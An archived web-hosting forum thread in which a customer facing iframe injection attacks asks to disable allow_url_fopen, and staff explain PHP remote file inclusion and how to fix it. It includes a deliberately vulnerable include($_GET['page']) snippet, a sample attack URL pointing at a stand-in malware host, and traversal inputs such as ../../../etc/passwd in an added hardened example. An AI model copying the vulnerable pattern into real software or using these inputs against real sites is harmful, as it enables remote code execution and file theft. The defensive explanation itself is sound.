The "Freeola Customer Forum" forum, which includes Retro Game Reviews, has been archived and is now read-only. You cannot post here or create a new thread or review on this forum.
N.
I must stress that the idea of this being a security risk is down to the programmer using functions that rely on this without validating content properly, and not due to the feature being enabled.
If you understand PHP, here is a simple example:
On a page somewhere:
<?php
.....
....
include($_GET['page']); // the include path is taken straight from the query string
...
...
?>
This allows someone to include other remote content by doing something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com/dodgyscript.php?inject
A simple fix would be to move your content pages to their own folder and then modify the code to this:
<?php
.....
....
include('page_dir/'.$_GET['page']); // a fixed local prefix means the path can no longer start with http://
...
...
?>
Try the .htaccess rules you asked support about and that may clear up your problems, although we can't really help if the rewrite rules cause problems.
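A worked version of the three variants, as an added example rather than code from the thread. It assumes a page_dir/ of .php content pages beside the script; the directory name, the slug pattern and the default page are assumptions. The first function is the vulnerable include, the second is the prefixed form from the post, which stops remote URLs but not "../" traversal, and the third restricts the name to a slug and checks the resolved path with realpath(). Two facts worth keeping in mind: from PHP 5.2 onward, including a URL is controlled by allow_url_include (off by default), not by allow_url_fopen alone, and both directives are PHP_INI_SYSTEM, so they can only be changed in the server-wide php.ini, not in a per-site php.ini or .htaccess, which is why an allow_url_fopen=off line in a site-level php.ini is silently ignored.

```php
<?php
// Added example, not code from the forum thread. Assumes content pages are
// .php files in a directory named page_dir/ next to this script; the page
// names and directory are assumptions for illustration. Needs PHP 7.1+.

// Reports whether remote include is even possible on this PHP build.
// allow_url_include (PHP >= 5.2) governs include/require of URLs;
// allow_url_fopen governs fopen()/file_get_contents() of URLs.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// 1. The vulnerable form from the post. With allow_url_include on,
//    ?page=http://attacker.example/x.php runs remote code; even with it off,
//    ?page=../../../etc/passwd reads a local file.
function include_page_vulnerable(string $page): void
{
    include $page;
}

// 2. The prefix fix from the post. The path can no longer start with a URL
//    scheme, so remote include is gone, but ?page=../../secrets.php still
//    escapes page_dir/ (directory traversal).
function include_page_prefixed(string $page): void
{
    include 'page_dir/' . $page;
}

// 3. Hardened form: only a plain slug is accepted, the file name is built by
//    this code (not the client), and the resolved path is checked to sit
//    inside the content directory before it is included.
function include_page_safe(string $page): void
{
    if (!preg_match('/^[a-z0-9_-]{1,64}$/', $page)) {
        http_response_code(404);
        exit('Unknown page');
    }
    $base = realpath(__DIR__ . '/page_dir');
    $path = ($base === false) ? false : realpath($base . '/' . $page . '.php');
    // realpath() returns false for a missing file and resolves symlinks, so
    // the prefix test rejects anything that ends up outside $base.
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}

$page = $_GET['page'] ?? 'home';   // 'home' is an assumed default page
include_page_safe($page);
```

The slug check alone already rules out "/" and ".", so the realpath() containment test is defence in depth against symlinks placed inside page_dir/; keeping both costs nothing and survives a later loosening of the pattern.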
Any progress on disabling this yet?
N.
I do hope you can invoke some kind of disabling of this. I believe it would greatly help.
I look forward to hearing any progress.
N.
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.
We don't allow customers to override PHP directives via their own php.ini files, as this could allow customers who changed options to compromise not just their own webspaces but those of other customers on the same server. However, it is probably possible to add a control panel option to allow certain safe options to be overridden, on the same basis as the enable global vars option (another option which can allow security risks).
...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?
N.
If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problems, and that is why it's generally considered a good idea to disable it.
I direct you to this article
http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/
I have been, and am still, experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.
I believe if allow_url_fopen was disabled it would help me immensely.
I have read that I can include
allow_url_fopen=off
in a site-level php.ini, but I have tried this and it appears not to make any difference to my webspace.
N.
Is it possible to disable this on my webspace (I see it is currently 'on')?
Neil